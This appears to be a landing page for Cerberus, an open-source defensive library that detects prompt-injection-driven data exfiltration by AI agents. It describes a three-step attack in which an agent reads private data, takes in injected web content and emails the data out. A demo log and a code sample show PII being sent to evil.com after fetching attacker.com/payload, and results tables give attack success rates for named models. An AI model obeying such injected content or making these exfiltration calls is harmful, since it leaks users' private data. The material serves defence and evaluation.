Agentic AI Runtime Security

Your AI agents are being
weaponized against you

Every AI agent that can read private data, process external content, and send outbound messages is vulnerable to the same fundamental attack. Cerberus detects, correlates, and blocks it โ€” in real time, before data leaves your system.

Get started in 5 min View on GitHub
cerberus demo
โ”€โ”€โ”€ Phase 1: Unguarded โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
โ†’ readCustomerData({}) โ† SSN, email, phone โ€” 5 records
โ†’ fetchWebpage({url}) โ† injection payload embedded in page
โ†’ sendEmail({to: "audit@evil.com", body: <PII>})
 
โš  EXFILTRATION CONFIRMED 1,202 bytes sent ยท $0.001 total cost
 
โ”€โ”€โ”€ Phase 2: Guarded โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
โ†’ readCustomerData [Cerberus] turn-000: score=1/4 โ†’ โ—‹
โ†’ fetchWebpage [Cerberus] turn-001: score=2/4 โ†’ โ—‹
โ†’ sendEmail [Cerberus] turn-002: score=3/4 โ†’ โœ— BLOCKED
 
โœ“ EXFILTRATION BLOCKED 0 requests to capture server
~100%
Attack success rate
across 3 LLM providers
N=285
Real API calls
scientifically validated
52ฮผs
Detection overhead p50
0.01% of LLM latency
747
Tests
98%+ coverage
0%
False positive rate
on clean control runs

The Lethal Trifecta

Every AI agent with three capabilities is exploitable. The attack is reproducible today with free-tier API access and three function calls.

Layer 1 โ€” L1
Privileged Access
Agent reads sensitive data โ€” CRM records, PII, internal documents, credentials.
Layer 2 โ€” L2
Injection
External content manipulates the agent's behavior โ€” a hidden instruction in a webpage, email, or document.
Layer 3 โ€” L3
Exfiltration
Agent sends private data to an attacker-controlled endpoint โ€” email, webhook, API call.

When all three fire in the same session, Cerberus scores the session at 3/4 and interrupts the outbound call โ€” before data leaves your system.

Layer 4 (novel): Cross-session memory contamination โ€” an attacker injects a payload into Session 1 that triggers exfiltration in Session 3. No existing tool detects this. Cerberus ships the first deployable defense.

One function call. Full coverage.

Cerberus wraps your existing tool executors. No agent framework changes. No model swaps.

๐Ÿ”
4 Detection Layers
L1 data source classification, L2 token provenance, L3 outbound intent, L4 memory contamination โ€” all feeding one correlation engine.
๐Ÿงฌ
6 Sub-Classifiers
Secrets detector, injection scanner, encoding detector, MCP poisoning scanner, domain classifier, behavioral drift detector.
๐Ÿ“ก
OpenTelemetry Built-In
One span + 3 metrics per tool call. Plug into Grafana, Datadog, Honeycomb, Jaeger โ€” any OTel backend. Zero overhead when disabled.
๐ŸŒ
HTTP Proxy Mode
Zero code changes. Run Cerberus as a gateway. Agent routes tool calls to POST /tool/:toolName โ€” detection is transparent.
๐Ÿ”Œ
Framework Adapters
Native support for LangChain, Vercel AI SDK, and OpenAI Agents SDK out of the box.
๐Ÿ“Š
Grafana Dashboard
Pre-built dashboard with 14 panels. One command: docker compose -f monitoring/docker-compose.yml up -d

Validated at scale

N=285 real API calls. 30 payloads ร— 3 trials ร— 3 providers. Wilson 95% confidence intervals. 6-factor causation scoring. 5 negative control runs per provider โ€” 0 false exfiltrations.

Provider Model Any Exfiltration Full Injection Compliance 95% CI
OpenAI gpt-4o-mini 100% (90/90) 17.8% (16/90) [11.2%, 26.9%]
Anthropic claude-sonnet-4 100% (90/90) 2.2% (2/90) [0.6%, 7.7%]
Google gemini-2.5-flash 98.9% (89/90) 48.9% (44/90) [38.8%, 59.0%]
Provider Detection Rate False Positive Rate L1 Accuracy L2 Accuracy
OpenAI 23.3% 0.0% 100% 100%
Anthropic 2.2% 0.0% 100% 100%
Google 70.0% 0.0% 100% 100%

L1 and L2 are deterministic โ€” 100% accuracy across all 285 runs, zero FPs, zero FNs. L3 detection tracks successful injection compliance. Control group: 0/15 false exfiltrations.

From zero to blocked attack in 5 minutes

Install the package and wrap your tool executors.

bash
npm install @cerberus-ai/core
TypeScript guard() wraps your tools โ€” no framework changes
import { guard } from '@cerberus-ai/core';

// Your existing tool executors
const tools = {
  readDatabase: async (args) => db.query(args.sql),
  fetchUrl:     async (args) => fetch(args.url).then(r => r.text()),
  sendEmail:    async (args) => mailer.send(args),
};

// One function call โ€” Cerberus intercepts transparently
const { executors: secured } = guard(
  tools,
  {
    alertMode: 'interrupt',
    threshold: 3,
    trustOverrides: [
      { toolName: 'readDatabase', trustLevel: 'trusted'   },
      { toolName: 'fetchUrl',     trustLevel: 'untrusted' },
    ],
  },
  ['sendEmail'], // outbound tools โ€” L3 monitors these
);

// Use exactly like before โ€” Cerberus runs in the middle
await secured.readDatabase({ sql: 'SELECT * FROM customers' });
await secured.fetchUrl({ url: 'https://attacker.com/payload' });
await secured.sendEmail({ to: 'audit@evil.com', body: piiData });
// โ†‘ [Cerberus] Tool call blocked โ€” risk score 3/4

See the getting-started guide for the full walkthrough, or try the Docker demo with no API keys:

bash โ€” no API keys required
docker run --rm ghcr.io/odingard/cerberus-demo

Works with your stack

Native adapters for every major agentic AI framework.

guard() โ€” generic createProxy() โ€” HTTP LangChain Vercel AI SDK OpenAI Agents SDK OpenAI Function Calling Anthropic Tool Use Google Gemini MCP Tool Scanning AutoGen โ€” planned Ollama โ€” planned

Start protecting your agents today

Open source. MIT license. Zero runtime dependencies beyond SQLite.

npm install @cerberus-ai/core Star on GitHub